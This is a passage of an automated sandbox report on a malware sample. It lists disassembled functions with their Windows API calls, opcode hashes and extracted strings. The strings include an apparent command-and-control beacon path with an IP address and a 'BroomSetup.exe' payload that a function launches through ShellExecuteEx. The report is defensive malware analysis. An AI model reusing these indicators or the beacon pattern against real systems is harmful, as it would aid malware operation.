                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                                                                                                  • String ID: /ping.php?substr=%s$185.172.128.228$Installed
                                                                                                                                                                                                                                  • API String ID: 3519838083-3380671521
                                                                                                                                                                                                                                  • Opcode ID: 0208322c849bd223be65c5dc220457c235287cfb99792f80a98781b5adf53624
                                                                                                                                                                                                                                  • Instruction ID: e2474b82748048003be2cedeb608fe93115641b11fdaf52311a1fe5e0c8c7dde
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0208322c849bd223be65c5dc220457c235287cfb99792f80a98781b5adf53624
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3A01CCB2A05155ABD705DF88DC44BAEB7B8FF48A10F14092AF805E7240E3B4BA50CAE1
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05D064C7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40synchronizationCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ShellExecuteEx.SHELL32(?), ref: 05D06509
                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,00008000), ref: 05D0651D
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 05D06526
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseExecuteHandleObjectShellSingleWait
                                                                                                                                                                                                                                  • String ID: /BroomSetup.exe
                                                                                                                                                                                                                                  • API String ID: 3837156514-1897133622
                                                                                                                                                                                                                                  • Opcode ID: db3e73961b18c1c10bd7b6012b861b807e274889a1b3163fb6465ff1849ddad4
                                                                                                                                                                                                                                  • Instruction ID: 139083faa9700a03222345039cb73b4cfd3916c2cedb1059351fa968dc4eb5e4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: db3e73961b18c1c10bd7b6012b861b807e274889a1b3163fb6465ff1849ddad4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C017C71E00218EBDB25DF69E9449DDBFB9FF08610F00812AF805A6160EB709645CF94
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00417D6F Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1036877536-0
                                                                                                                                                                                                                                  • Opcode ID: 557eb8767c00bad00038b2e5be713a3e80c22743073acb8fbc22b4e1da937f5c
                                                                                                                                                                                                                                  • Instruction ID: 95edb75e536639b33972a857d440f8be94c0c6db010a7eda39038c13656bb89e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 557eb8767c00bad00038b2e5be713a3e80c22743073acb8fbc22b4e1da937f5c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0FA11372A083869FDB218F18C8817EBBBF1EF55354F1541AEE4859B381C63C8D82C758
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05CF7FD6 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1036877536-0
                                                                                                                                                                                                                                  • Opcode ID: 557eb8767c00bad00038b2e5be713a3e80c22743073acb8fbc22b4e1da937f5c
                                                                                                                                                                                                                                  • Instruction ID: b55acb8f330b525d84ec3179ab62212a9c46e52dfb22f9248b24196f07b35849
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 557eb8767c00bad00038b2e5be713a3e80c22743073acb8fbc22b4e1da937f5c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A8A15872A047869FDF25CF58C890BBEBBE5FF11350F144AADD6959B281C3389A41C750
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0042299F Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                                                  • Opcode ID: f01287b46ae53a51101a135f4392dfdbeaf8165ae30d8bdb7f55eb9fcaa53402
                                                                                                                                                                                                                                  • Instruction ID: c8489a2078e21136fa723fa80d13f2eda68097992bc6546b806c704246c56682
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f01287b46ae53a51101a135f4392dfdbeaf8165ae30d8bdb7f55eb9fcaa53402
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AE414C31B402217BDB306E7A9D41BAF3A64EF45374F54025BF818D6691DAFC8C9182AD
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05D02C06 Relevance: 6.2, APIs: 4, Instructions: 152COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                                                  • Opcode ID: 963c7352d2e0a54c0d0f88c3f11fb2999fab24a43c9dca7c6f6700f89c7226dd
                                                                                                                                                                                                                                  • Instruction ID: a2220b35b5e6e560052046bd8af0be11217f29edf5e0652a71ec25361178693f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 963c7352d2e0a54c0d0f88c3f11fb2999fab24a43c9dca7c6f6700f89c7226dd
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C3413139B056046BDB61ABB8CC8CBBE36A6FF05370F141A17F514D63D0DA74894157B1
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05CFB690 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,0042D740,00000000,00000000,8B56FF8B,05CF4002,?,00000004,00000001,0042D740,0000007F,?,8B56FF8B,00000001), ref: 05CFB6DD
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 05CFB766
                                                                                                                                                                                                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 05CFB778
                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 05CFB781
                                                                                                                                                                                                                                    • Part of subcall function 05CF7CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05CF7CDE
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2652629310-0
                                                                                                                                                                                                                                  • Opcode ID: 418993263a88c618d282e3586c2c640cbdd5746430a48a443b1d1fb7bcbd7a35
                                                                                                                                                                                                                                  • Instruction ID: 6261388b75e242e8d369c7cf1ed66f23ee0d18a372e7fb7564ad221281ceb676
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 418993263a88c618d282e3586c2c640cbdd5746430a48a443b1d1fb7bcbd7a35
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9131F272A0020AABDF25CF64CC84EAF7BB5EF40254F150929ED05D7290EB35DD54CBA0
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040CCA4 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ___BuildCatchObject.LIBVCRUNTIME ref: 0040CCBE
                                                                                                                                                                                                                                    • Part of subcall function 0040CC0B: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0040CC3A
                                                                                                                                                                                                                                    • Part of subcall function 0040CC0B: ___AdjustPointer.LIBCMT ref: 0040CC55
                                                                                                                                                                                                                                  • _UnwindNestedFrames.LIBCMT ref: 0040CCD3
                                                                                                                                                                                                                                  • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 0040CCE4
                                                                                                                                                                                                                                  • CallCatchBlock.LIBVCRUNTIME ref: 0040CD0C
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 737400349-0
                                                                                                                                                                                                                                  • Opcode ID: 47db2c8148be1e88ced26f356c7ddfb08dca30c4f884cb2ff03c50df69916c0c
                                                                                                                                                                                                                                  • Instruction ID: 6cd8a4fdf9e309ef40a66346d060796d29459ceaa081db5c793327cde4683266
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 47db2c8148be1e88ced26f356c7ddfb08dca30c4f884cb2ff03c50df69916c0c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AA012D72500108BBDF116F96CC81DEB3F69EF98758F044129FE0866261C73AE861DBA4
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05CECF0B Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ___BuildCatchObject.LIBVCRUNTIME ref: 05CECF25
                                                                                                                                                                                                                                    • Part of subcall function 05CECE72: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 05CECEA1
                                                                                                                                                                                                                                    • Part of subcall function 05CECE72: ___AdjustPointer.LIBCMT ref: 05CECEBC
                                                                                                                                                                                                                                  • _UnwindNestedFrames.LIBCMT ref: 05CECF3A
                                                                                                                                                                                                                                  • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 05CECF4B
                                                                                                                                                                                                                                  • CallCatchBlock.LIBVCRUNTIME ref: 05CECF73
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 737400349-0
                                                                                                                                                                                                                                  • Opcode ID: 47db2c8148be1e88ced26f356c7ddfb08dca30c4f884cb2ff03c50df69916c0c
                                                                                                                                                                                                                                  • Instruction ID: 14560e8e160385e54ff228da222fab9f675fd558dc5b55d9803f144aac3a5fb2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 47db2c8148be1e88ced26f356c7ddfb08dca30c4f884cb2ff03c50df69916c0c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 34012D72600108BBCF126E95CC48DEB7B69FF49754F044408FE0856120D736D961EBA0
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05CF74BA Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,05CEED94,00000000,00000000,?,05CF7461,05CEED94,00000000,00000000,00000000,?,05CF7719,00000006,0042E2F8), ref: 05CF74EC
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,05CF7461,05CEED94,00000000,00000000,00000000,?,05CF7719,00000006,0042E2F8,0042E2F0,0042E2F8,00000000,00000364,?,05CF7052), ref: 05CF74F8
                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,05CF7461,05CEED94,00000000,00000000,00000000,?,05CF7719,00000006,0042E2F8,0042E2F0,0042E2F8,00000000), ref: 05CF7506
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3177248105-0
                                                                                                                                                                                                                                  • Opcode ID: cfd02a50bf476b7c4f1bcf1e7d068622a64cc9e2d77f2ff3f9ca9aa917f168a2
                                                                                                                                                                                                                                  • Instruction ID: 5f3ae306669d40680e1411826b6603adfb3a97d06c8f061ab497a03cf9e68135
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cfd02a50bf476b7c4f1bcf1e7d068622a64cc9e2d77f2ff3f9ca9aa917f168a2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C70124323422269BC7B08B29AC44E6A3BDAFF046A17524D34FB06E3180DB60D901C7E4
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041293D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __startOneArgErrorHandling.LIBCMT ref: 004129CD
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorHandling__start
                                                                                                                                                                                                                                  • String ID: pow
                                                                                                                                                                                                                                  • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                                  • Opcode ID: 0168bbcefadc1572663007d7dce21aba4256d125ab4b2ee182621d1a610e57aa
                                                                                                                                                                                                                                  • Instruction ID: e0eefe9174cd7462181434ea84c362ca9420c476202b864f0baa4bab5f354a80
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0168bbcefadc1572663007d7dce21aba4256d125ab4b2ee182621d1a610e57aa
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8D515DB1B5420196C7217B19CE813EB2B90EB40744F64496BE085C23E8EB7D8CE7DA4E
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041E281 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0041DE54: GetOEMCP.KERNEL32(00000000,?,?,0041E0DD,?), ref: 0041DE7F
                                                                                                                                                                                                                                  • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0041E122,?,00000000), ref: 0041E2F5
                                                                                                                                                                                                                                  • GetCPInfo.KERNEL32(00000000,"A,?,?,?,0041E122,?,00000000), ref: 0041E308
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CodeInfoPageValid
                                                                                                                                                                                                                                  • String ID: "A
                                                                                                                                                                                                                                  • API String ID: 546120528-1838006985
                                                                                                                                                                                                                                  • Opcode ID: 1283d02f46e1589de4851ffd21eb46f7b56e6e61e2be4b5569ea5d9b61fcf244
                                                                                                                                                                                                                                  • Instruction ID: 9adfac426f14955098f9a8953225ebda5108e0851b5f4a0d8690ab915da4ef9e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1283d02f46e1589de4851ffd21eb46f7b56e6e61e2be4b5569ea5d9b61fcf244
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1F511774A002499EDB208F36C8846FBBBE5EF51304F14446FD8A68B251D73D95C6CB99
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05D065BB Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 149COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 05D065C0
                                                                                                                                                                                                                                    • Part of subcall function 05CE4073: __EH_prolog.LIBCMT ref: 05CE4078
                                                                                                                                                                                                                                    • Part of subcall function 05CE4073: std::locale::_Init.LIBCPMT ref: 05CE409A
                                                                                                                                                                                                                                  • _Deallocate.LIBCONCRT ref: 05D06714
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: H_prolog$DeallocateInitstd::locale::_
                                                                                                                                                                                                                                  • String ID: hzB
                                                                                                                                                                                                                                  • API String ID: 2389838984-4102550090
                                                                                                                                                                                                                                  • Opcode ID: bd51143135a8815fbe86bb61eaf86818a294b752ba5ce55ce2693886611e2087
                                                                                                                                                                                                                                  • Instruction ID: a16ef0aea8af23f9608b81b026acbf1e97a4cb1ff2e81b1cbde5869d9de806d1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bd51143135a8815fbe86bb61eaf86818a294b752ba5ce55ce2693886611e2087
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7D51AA71E01248DFDB18DFA9C894AEDBBB5FF58300FA4462EE406A7281D730AA45CF50
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041DF2C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0041DF51
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Info
                                                                                                                                                                                                                                  • String ID: $^A
                                                                                                                                                                                                                                  • API String ID: 1807457897-1499568600
                                                                                                                                                                                                                                  • Opcode ID: 83da749ea859946a51b81c35361cbdd594582fb38d57894b34583c031ad0444d
                                                                                                                                                                                                                                  • Instruction ID: 9b2ab00e05afc5395f67001553a0f729d0bbf79a9b46b691f859092dfb419bf1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 83da749ea859946a51b81c35361cbdd594582fb38d57894b34583c031ad0444d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 46415CB49042589EDB218E25CC80BFABFE9DB49304F1404EEE58A87143D2799AC6CF64
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041FEC2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0042011D,?,00000050,?,?,?,?,?), ref: 0041FF9D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: ACP$OCP
                                                                                                                                                                                                                                  • API String ID: 0-711371036
                                                                                                                                                                                                                                  • Opcode ID: 42f9bcd6f4e5afa2ede7f930f8a4cc0c89f81ec70c3ed948d7487cfdec4ae167
                                                                                                                                                                                                                                  • Instruction ID: dacf84d8a1ebef4056087089fc013b288552bfb44d7b698df7e4a4e4da77cf20
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 42f9bcd6f4e5afa2ede7f930f8a4cc0c89f81ec70c3ed948d7487cfdec4ae167
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F721F472B04101A6D7308B54D901BDBA3A6EB52B24F564077F90AC7301FBBADDCBC258
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05D00129 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,05D00384,?,00000050,?,?,?,?,?), ref: 05D00204
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: ACP$OCP
                                                                                                                                                                                                                                  • API String ID: 0-711371036
                                                                                                                                                                                                                                  • Opcode ID: 42f9bcd6f4e5afa2ede7f930f8a4cc0c89f81ec70c3ed948d7487cfdec4ae167
                                                                                                                                                                                                                                  • Instruction ID: 2f6cf54d8940304a4f1a7ab04c6f9596c284cd13cd641ec3de4e1f4c49a79963
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 42f9bcd6f4e5afa2ede7f930f8a4cc0c89f81ec70c3ed948d7487cfdec4ae167
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D021C162B02205B6E7348B64CD08FAB73ABBB54B51FC69427E94AD7180E732D940C392
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004171B7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00417217
                                                                                                                                                                                                                                  • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00417224
